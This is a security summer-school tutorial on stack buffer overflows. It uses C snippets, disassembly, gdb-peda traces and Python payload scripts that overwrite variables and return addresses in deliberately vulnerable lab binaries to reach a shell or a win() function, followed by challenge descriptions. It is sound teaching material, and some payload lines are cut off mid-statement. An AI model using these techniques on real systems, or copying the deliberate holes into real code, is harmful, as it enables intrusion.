====== 0x05. Buffer Exploitation ======
===== Resources =====
[[https://security.cs.pub.ro/summer-school/res/slides/06-buffer-management.pdf|Session 5 slides]]
[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|Session's tutorials and challenges archive]]
[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|Session's code snippets]].
/*[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-full.zip|Session's solutions]]*/
===== Tutorials =====
===== Buffers =====
A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes.
In C, we can declare a buffer of bytes as a char array, as follows:
char local_buffer[32];
Which results in the following assembly code:
080483db :
80483db: 55 push ebp
80483dc: 89 e5 mov ebp,esp
80483de: 83 ec 20 sub esp,0x20
80483e1: b8 00 00 00 00 mov eax,0x0
80483e6: c9 leave
80483e7: c3 ret
Notice that buffer allocation is done by simply subtracting its intended size from the current stack pointer (''sub esp, 0x20''). This simply reserves space on the stack (remember that on x86 the stack grows "upwards", from higher addresses to lower ones).
A compiler may allocate more space on the stack than explicitly required. For example, on a 64-bit machine with stack canary enabled (an additional 64-bit value is implicitly placed between buffers and the return address - more on that in future sessions), declaring either ''char s[32]'' or ''char s[40]'' might yield ''sub rsp, 0x30'' to align buffers at 16 bytes thresholds.
To exploit a program, the C source code may not be a good enough reference point. Only disassembling the executable will provide relevant information.
Buffers can be also be stored in other places in memory, such as the ''heap'', ''.bss'' or ''.rodata''.
You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffers/buffers.c'').
#include
#include
char g_buf_init_zero[32] = {0};
/* g_buf_init_vals[5..31] will be 0 */
char g_buf_init_vals[32] = {1, 2, 3, 4, 5};
const char g_buf_const[32] = "Hello, world\n";
int main(void)
{
char l_buf[32];
static char s_l_buf[32];
char *heap_buf = malloc(32);
free(heap_buf);
return 0;
}
Let's have a look at the executable sections:
$ readelf -S buffers
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
...
[16] .rodata PROGBITS 080485a0 0005a0 000040 00 A 0 0 32
...
[24] .data PROGBITS 0804a020 001020 000040 00 WA 0 0 32
[25] .bss NOBITS 0804a060 001060 000060 00 WA 0 0 32
...
Key to Flags:
W (write)
A (alloc)
And the address of each symbol (buffer in this case):
080485c0 R g_buf_const
0804a040 D g_buf_init_vals
0804a080 B g_buf_init_zero
0804a0a0 b s_l_buf.2387
Key to Flags:
R (symbol is read-only)
D (symbol in initialized data section)
B (symbol in BSS data section)
Uppercase and lowercase flags have the same meaning.
A lowercase flag means variable is not visible outside the module
Alternatively, you can use gdb to extract information on each symbol:
gdb-peda$ p &g_buf_const
$1 = ( *) 0x80485c0
Using this information you can map each symbol to a data section.
For example, the address of g_buf_const is ''0x80485c0'', so it is placed
in the .rodata section ''addr=0x080485a0; size=0x40''.
Non-static local variables and dynamically allocated buffers cannot be
seen in the executable (they have meaning only at runtime, because they are
allocated on the stack or heap when the code reaches a certain point. Let's
inspect the execution right before calling free() and see where the heap
buffer will be placed:
gdb-peda$
----------------------------------registers-----------------------------------]
EAX: 0x804b160 --> 0x0
EBX: 0x0
ECX: 0x21e79
EDX: 0x804b160 --> 0x0
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0xffffd798 --> 0x0
ESP: 0xffffd750 --> 0x804b160 --> 0x0
EIP: 0x80484e8 (: call 0x8048350 )
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80484df : mov DWORD PTR [ebp-0x30],eax
0x80484e2 : sub esp,0xc
0x80484e5 : push DWORD PTR [ebp-0x30]
=> 0x80484e8 : call 0x8048350
0x80484ed : add esp,0x10
0x80484f0 : mov eax,0x0
0x80484f5 : mov edx,DWORD PTR [ebp-0xc]
0x80484f8 : xor edx,DWORD PTR gs:0x14
Guessed arguments:
arg[0]: 0x804b160 --> 0x0
[------------------------------------stack-------------------------------------]
0000| 0xffffd750 --> 0x804b160 --> 0x0
0004| 0xffffd754 --> 0xffffd9e0 ("examples/buffers")
0008| 0xffffd758 --> 0xf7e0f049 (add ebx,0x1a4fb7)
0012| 0xffffd75c --> 0xf7fb7748 --> 0x0
0016| 0xffffd760 --> 0xf7fb4000 --> 0x1d4d6c
0020| 0xffffd764 --> 0xf7fb4000 --> 0x1d4d6c
0024| 0xffffd768 --> 0x804b160 --> 0x0
0028| 0xffffd76c --> 0xf7e0f1ab (add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gdb-peda$ x/wx $ebp-0x30
0xffffd768: 0x0804b160
gdb-peda$ vmm
Start End Perm Name
...
0x0804b000 0x0806d000 rw-p [heap]
...
The gdb-peda ''vmm'' command displays the virtual memory map of the process;
this can be used to easily inspect the addresses and permissions of each memory region.
You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''init_buffer/init_buffer.c'').
Let's fill our stack buffer with some values and disassemble the binary:
char local_buffer[32];
unsigned int i = 0;
for (i = 0; i < 32; i++) {
local_buffer[i] = i;
}
080483db :
80483db: 55 push ebp
80483dc: 89 e5 mov ebp,esp
80483de: 83 ec 24 sub esp,0x24 ; reserve space for both the local_buffer (0x20) and i (0x4)
80483e1: c7 45 fc 00 00 00 00 mov DWORD PTR [ebp-0x4],0x0 ; initialize i
80483e8: c7 45 fc 00 00 00 00 mov DWORD PTR [ebp-0x4],0x0 ; redundant unoptimized compiler logic
80483ef: eb 13 jmp 8048404 ; goto the end of loop
80483f1: 8b 45 fc mov eax,DWORD PTR [ebp-0x4] ; get value of 'i' in eax
80483f4: 89 c1 mov ecx,eax ; save 'i' in ecx
80483f6: 8d 55 dc lea edx,[ebp-0x24] ; load the address of 'local_buffer' in edx
80483f9: 8b 45 fc mov eax,DWORD PTR [ebp-0x4] ; get 'i'
80483fc: 01 d0 add eax,edx ; compute address of 'local_buffer+i' in eax
80483fe: 88 08 mov BYTE PTR [eax],cl ; store 'i' at *(local_buffer+i)
8048400: 83 45 fc 01 add DWORD PTR [ebp-0x4],0x1 ; increment 'i'
8048404: 83 7d fc 1f cmp DWORD PTR [ebp-0x4],0x1f ; 'i==31'?
8048408: 76 e7 jbe 80483f1 ; continue loop if below or equal or fall through if above
804840a: b8 00 00 00 00 mov eax,0x0
804840f: c9 leave
8048410: c3 ret
Notice that now we subtract ''0x24'' from the stack pointer, since this time we also need to reserve space for the ''unsigned integer'' used as an index.
Similar to how arguments are referenced using ''ebp'', so are the local variables. Since in most cases the value of ''ebp'' stays fixed throughout the execution of a function, you can easily track local variables and buffers by mapping names to offsets (i.e. 'i' to '-0x4', 'local_buffer' to '-0x24' and so on). Intermediary positions within the buffer are almost always computed by using the base address and adding an offset to it.
Values at offsets relative to ''ebp'' have their meaning defined by their use, instead of static names. This implies that even if the allocated space is 0x24, the compiler may
reorder local buffers, and space may be interpreted as either 'i' at 'ebp-0x4' and 'local_buffer' at 'ebp-0x24', or 'i' at 'ebp-0x24' and 'local_buffer' at 'ebp-0x20'.
Finally, lets add one more interesting change to our code:
char local_buffer2[30];
char local_buffer[2];
unsigned int i = 0;
for (i = 0; i < 32; i++) {
local_buffer[i] = i;
}
Can you guess how the resulting code will look like, disassembled? Where are we writing to?
==== Stack buffer overflows ====
As we have seen in previous sessions, the stack serves multiple purposes:
* Passing function arguments from the caller to the callee
* Storing local variables for functions
* Temporarily saving register values before a call
* Saving the return address and old frame pointer
Our previous example clearly showcases the fact that even though in an abstract sense, different buffers are separate from one another, ultimately they are just some regions of memory which do not have any intrinsic identification or associated size. This is the reason why in some higher level languages it is not possible to write beyond the bounds of containers - the size is integrated into the object itself.
But in our case, bounds are unchecked, therefore it is up to the programmer to code carefully. This includes checking for any overflows and using **safe functions**. Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them.
What can happen in the event that we write outside the bounds of a stack buffer?
You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow/buffer_overflow.c'').
void f(char *buf)
{
unsigned int i = 0;
for (i = 0; i < 100; i++) {
buf[i] = i;
}
}
int main(int argc, char* argv[])
{
char local_buffer[32];
f(local_buffer);
return 0;
}
$ ./buffer_overflow
Segmentation fault (core dumped)
What happened? Let's try to find the cause starting with the call of ''f'':
gdb-peda$ b *0x08048430
Breakpoint 1 at 0x8048430
gdb-peda$ r
[----------------------------------registers-----------------------------------]
EAX: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
EBX: 0x0
ECX: 0x38f575fd
EDX: 0xffffd684 --> 0x0
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0xffffd658 --> 0x0
ESP: 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
EIP: 0x8048430 (: call 0x80483f6 )
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048429 : sub esp,0x20
0x804842c : lea eax,[ebp-0x20]
0x804842f : push eax
=> 0x8048430 : call 0x80483f6
0x8048435 : add esp,0x4
0x8048438 : mov eax,0x0
0x804843d : leave
0x804843e : ret
Guessed arguments:
arg[0]: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
arg[1]: 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
[------------------------------------stack-------------------------------------]
0000| 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
0004| 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
0008| 0xffffd63c --> 0x8048461 (<__libc_csu_init+33>: lea eax,[ebx-0xf4])
0012| 0xffffd640 --> 0xf7fe59b0 (push ebp)
0016| 0xffffd644 --> 0x0
0020| 0xffffd648 --> 0x8048449 (<__libc_csu_init+9>: add ebx,0x1bb7)
0024| 0xffffd64c --> 0x0
0028| 0xffffd650 --> 0xf7fb4000 --> 0x1d4d6c
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x08048430 in main ()
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd69b --> 0x63 ('c')
EBX: 0x0
ECX: 0x38f575fd
EDX: 0x63 ('c')
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0xffffd658 (" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
ESP: 0xffffd634 --> 0xffffd638 --> 0x3020100
EIP: 0x8048435 (: add esp,0x4)
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804842c : lea eax,[ebp-0x20]
0x804842f : push eax
0x8048430 : call 0x80483f6
=> 0x8048435 : add esp,0x4
0x8048438 : mov eax,0x0
0x804843d : leave
0x804843e : ret
0x804843f: nop
[------------------------------------stack-------------------------------------]
0000| 0xffffd634 --> 0xffffd638 --> 0x3020100
0004| 0xffffd638 --> 0x3020100
0008| 0xffffd63c --> 0x7060504
0012| 0xffffd640 --> 0xb0a0908
0016| 0xffffd644 --> 0xf0e0d0c
0020| 0xffffd648 --> 0x13121110
0024| 0xffffd64c --> 0x17161514
0028| 0xffffd650 --> 0x1b1a1918
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048435 in main ()
gdb-peda$ b *0x0804843e
Breakpoint 2 at 0x0804843e
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x38f575fd
EDX: 0x63 ('c')
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0x23222120 (' !"#')
ESP: 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
EIP: 0x804843e (: ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048435 : add esp,0x4
0x8048438 : mov eax,0x0
0x804843d : leave
=> 0x804843e : ret
0x804843f: nop
0x8048440 <__libc_csu_init>: push ebp
0x8048441 <__libc_csu_init+1>: push edi
0x8048442 <__libc_csu_init+2>: push esi
[------------------------------------stack-------------------------------------]
0000| 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0004| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0008| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0012| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0016| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0020| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0024| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0028| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 2, 0x0804843e in main ()
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x38f575fd
EDX: 0x63 ('c')
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0x23222120 (' !"#')
ESP: 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
EIP: 0x27262524 ("$%&'")
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x27262524
[------------------------------------stack-------------------------------------]
0000| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0004| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0008| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0012| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0016| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0020| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0024| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0028| 0xffffd67c ("DEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x27262524 in ?? ()
It seems that the return address of ''main'', along with a lot more of the stack, gets overwritten with the characters that we write "in the buffer". The program then tries to "return to $%&'" ($%&' is the ASCII representation of little endian 0x27262524), which is an unmapped address. This ultimately triggers a page fault, upon which the operating system signals a ''SIGSEGV'' and terminates the process.
A buffer overflow is an anomaly caused by writing beyond the bounds of a buffer; it is not necessarily a vulnerability. The presence of a buffer overflow can lead to strange behavior, a crash, arbitrary code execution or absolutely **nothing**.
==== Diverting code execution ====
We attempted to use the wonderful ''gets'' function, but the compiler does not generate it and the man page explicitly says:
DESCRIPTION
Never use this function.
gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a
null byte ('\0'). No check for buffer overrun is performed (see BUGS below).
However, we can still handcraft our own vulnerable scenario. Let's try to divert the code execution by using a buffer overflow vulnerability.
You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_var/buffer_overflow_var.c'').
#include
#include
void f(char* buf) {
fgets(buf, 100, stdin);
}
int main(int argc, char* argv[])
{
int critical_variable = 0;
char local_buffer[32];
f(local_buffer);
if (critical_variable == 1337) {
printf("Oh dear, you shouldn't be here!\n");
system("/bin/sh");
}
return 0;
}
Our ''local_buffer'' is dangerously close to that critical variable. Let's see if we can overwrite it. We need 32 bytes of input to fill our buffer + 4 bytes for the integer.
$ python -c "print 'A'*32 + '1337'" | ./buffer_overflow_var
Nothing happened. Let's find out why. We'll save our payload to a file and run ''buffer_overflow_var'' under gdb, using the file as input:
$ python -c "print 'A'*32 + '1337'" > payload
$ gdb ./buffer_overflow_var
gdb-peda$ b *0x80484fc
Breakpoint 1 at 0x80484fc
gdb-peda$ r < payload
Starting program: ./buffer_overflow_var < payload
[----------------------------------registers-----------------------------------]
EAX: 0xffffd5dc ('A' , "1337\n")
EBX: 0x0
ECX: 0xf7fb589c --> 0x0
EDX: 0xffffd5dc ('A' , "1337\n")
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0xffffd608 --> 0x0
ESP: 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c
EIP: 0x80484fc (: cmp DWORD PTR [ebp-0xc],0x539)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80484f3 : push eax
0x80484f4 : call 0x80484b6
0x80484f9 : add esp,0x10
=> 0x80484fc : cmp DWORD PTR [ebp-0xc],0x539
0x8048503 : jne 0x8048525
0x8048505 : sub esp,0xc
0x8048508 : push 0x80485c0
0x804850d : call 0x8048360
[------------------------------------stack-------------------------------------]
0000| 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c
0004| 0xffffd5d4 --> 0xf7fb4000 --> 0x1d4d6c
0008| 0xffffd5d8 --> 0x0
0012| 0xffffd5dc ('A' , "1337\n")
0016| 0xffffd5e0 ('A' , "1337\n")
0020| 0xffffd5e4 ('A' , "1337\n")
0024| 0xffffd5e8 ('A' , "1337\n")
0028| 0xffffd5ec ('A' , "1337\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x080484fc in main ()
gdb-peda$ x/wx $ebp-0xc
0xffffd5fc: 0x37333331
gdb-peda$ x/s $ebp-0xc
0xffffd5fc: "1337\n"
We usually use high level scripting languages, such as **python** to craft payloads. For example, to generate 32 ''A''s, we just use '''A'*32''.
We can observe two things:
* We actually wrote the __string__ ''1337'', which is ''0x37333331'', instead of the actual value ''1337'' or ''0x539'' in hex.
* We missed the fact that x86 is Little Endian, meaning that we should write the integer value into memory starting with the least significant byte first.
An easy way to overcome this is to write a small script which will generate the required payload for us, as follows:
#!/usr/bin/env python
import struct
buflen = 32
payload = 'A' * buflen
payload += struct.pack('
Note the use of ''struct.pack'' and ''struct.unpack'' when working with binary data that needs to be stored in various configurations.
Let's test our new payload:
$ cat payload | ./buffer_overflow_var
Oh dear, you shouldn't be here!
It seems to alter the code flow as we wanted to, but it doesn't seem to spawn a (new) shell. What gives? The gist of the issue is the fact that the binary reads from ''stdin'' in one "chomp". Our newly spawned shell has no input to read, and exits before we get a change to input any commands (similarly to how the shell behaves when sending ''Ctrl-D'' - ''end of input''. We can use the following clever trick to keep ''stdin'' open for further user interaction:
$ cat payload - | ./buffer_overflow_var
Oh dear, you shouldn't be here!
date
Tue Jun 27 22:17:48 EEST 2017
whoami
root
We used the ''cat filename -| ./binary'' trick to concatenate the contents of ''filename'' with the ''standard input''. Once EOF is reached, you can continue feeding data to the binary via the standard input.
==== Overwriting the stored return address ====
Let's wrap up our stack smashing adventure by changing the code flow through overwriting the return address stored on the stack.
You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_ret/buffer_overflow_ret.c'').
#include
void win()
{
printf("Well done!\n");
}
void f()
{
printf("Nothing to see here\n");
}
void get_message(char *buf)
{
fgets(buf, 100, stdin);
}
int main(int argc, char* argv[])
{
char local_buffer[32];
printf("Please leave a message: ");
get_message(local_buffer);
f();
return 0;
}
First, let's trigger the program to crash like in the previous example:
$ ./buffer_overflow_ret
Please leave a message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nothing to see here
Segmentation fault (core dumped)
However, we do not know at which point relative to the start of our buffer the saved return address gets overwritten. We can either compute it by looking at the disassembly and the stack layout or by using a De Bruijn pattern in PEDA. Such a pattern contains unique groups of 4 characters, meaning that each group will have a unique offset within the pattern.
$ gdb ./buffer_overflow_ret
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r
Starting program: ./buffer_overflow_ret
Please leave a message: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALL
Nothing to see here
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x804b160 ("Nothing to see here\nge: ")
EDX: 0xf7fb5890 --> 0x0
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0x61414145 ('EAAa')
ESP: 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
EIP: 0x41304141 ('AA0A')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41304141
[------------------------------------stack-------------------------------------]
0000| 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0004| 0xffffd624 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0008| 0xffffd628 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0012| 0xffffd62c ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0016| 0xffffd630 ("2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0020| 0xffffd634 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0024| 0xffffd638 ("A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0028| 0xffffd63c ("IAAeAA4AAJAAfAA5AAKAAgAA6AA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41304141 in ?? ()
gdb-peda$ patto AA0A
AA0A found at offset: 40
This tells us that we need to write 40 characters into the buffer and then the next 4 bytes will overwrite the return address. Let's test this, again, by writing a script that can generate a payload, which we can easily tailor to our needs. First, let's see if we can reliably change the value of the return address. We'll attempt to write ''0xdeadbeef'' first.
#!/usr/bin/env python
import struct
payload = 'A' * 36
payload += struct.pack('
gdb-peda$ r < payload
Starting program: ./buffer_overflow_ret < payload
Please leave a message: Nothing to see here
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x804b160 ("Please leave a message: Nothing to see here\n")
EDX: 0xf7fb5890 --> 0x0
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0x61616161 ('aaaa')
ESP: 0xffffd620 --> 0x0
EIP: 0xdeadbeef
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0xdeadbeef
[------------------------------------stack-------------------------------------]
0000| 0xffffd620 --> 0x0
0004| 0xffffd624 --> 0xffffd6b4 --> 0xffffd859 ("./buffer_overflow_ret")
0008| 0xffffd628 --> 0xffffd6bc --> 0xffffd8cb ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
0012| 0xffffd62c --> 0xffffd644 --> 0x0
0016| 0xffffd630 --> 0x1
0020| 0xffffd634 --> 0x0
0024| 0xffffd638 --> 0xf7fb4000 --> 0x1d4d6c
0028| 0xffffd63c --> 0xf7fe575a (add edi,0x178a6)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xdeadbeef in ?? ()
Excellent. Now we can replace ''0xdeadbeef'' with the address of the ''win'' function.
...
payload += struct.pack('
$ cat payload | ./buffer_overflow_ret
Please leave a message: Nothing to see here
Well done!
Segmentation fault (core dumped)
Our job here is done. Now it's time for you to smash some stacks.
Keep in mind that buffer overflows are not the only type of vulnerability, but they are very common.
===== Challenges =====
Before venturing forth, consider the following roadmap when approaching a challenge:
* disassemble the binary
* identify the stack buffer
* identify functions which work with buffers
* see if there are any mismatches (declared size vs. index used)
* dynamic analysis in GDB; inject De Bruijn patterns whenever input is read
* determine offset in buffer
* write a script which generates a payload to reliably crash/exploit the target
* keep stdin/connection open for further interaction after obtaining a shell
* ???
* PROFIT
Use the following [[http://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|archive]].
==== 01. Parrot ====
Some programs feature a "stack smashing protection" in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. If the value has changed, then the "canary" can conclude that stack data has been corrupted throughout the execution of the current function.
We have implemented our very own ''parrot''. Can you avoid it somehow?
Values are little endian. So if you want to send ''0xabcd'' you would send it as ''\xcd\xab\x00\x00''.
When providing input to a program and wanting to maintain connection to its standard input, run:
cat payload - | ./program
Or, if you have a payload generator program such as ''payload.py'', run:
cat <(python payload.py) - | ./program
==== 02. Indexing ====
More complex programs require some form of protocol or user interaction. This is where the great [[https://github.com/Gallopsled/pwntools|pwntools]] come in.
Here's an interactive script to get you started:
#!/usr/bin/env python
from pwn import *
p = process('./indexing')
p.recvuntil('Index: ')
p.sendline() # TODO (must be string)
# Give value
p.recvuntil('Value: ')
p.sendline() # TODO (must be string)
p.interactive()
Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB.
You can inspect the behavior of a program for a given input by doing:
cat payload | strace ./program
That is, you will trace the program being exploited and see ''read()'' or other calls and how they fare for a given input.
==== 03. Smashthestack Level7 ====
Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one.
There's an integer overflow + buffer overflow in the program.
What are the four 32 bit values that multiplied by ''4'' give you, let's say, ''256''?
In order to run a program that receives command line arguments under gdb, you can do the following:
$ gdb ./main
gdb$ set args arg1 arg2 arg3
gdb$ start
==== 04. Neighbourly ====
Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same.
The ''ptext'' field of the structure is a function pointer. Overwrite it with the address of the ''win()'' function.
==== 05. Uninitialized ====
There's something faulty in the program, and it's **not** an buffer overflow. Provide the proper input to the executable and get a shell.
Do **not** use pwntools for this task.
==== 06: Bonus: Uninitialized 2 ====
There's a small update to the ''uninitialized'' executable and you need to update your solution.
Use ''ltrace'' to understand what's happening differently.
Create a pwntools-based script to solve both the initial executable and the bonus one.
==== 05. Bonus: Birds ====
Time for a more complex challenge. Be patient and don't speed through it.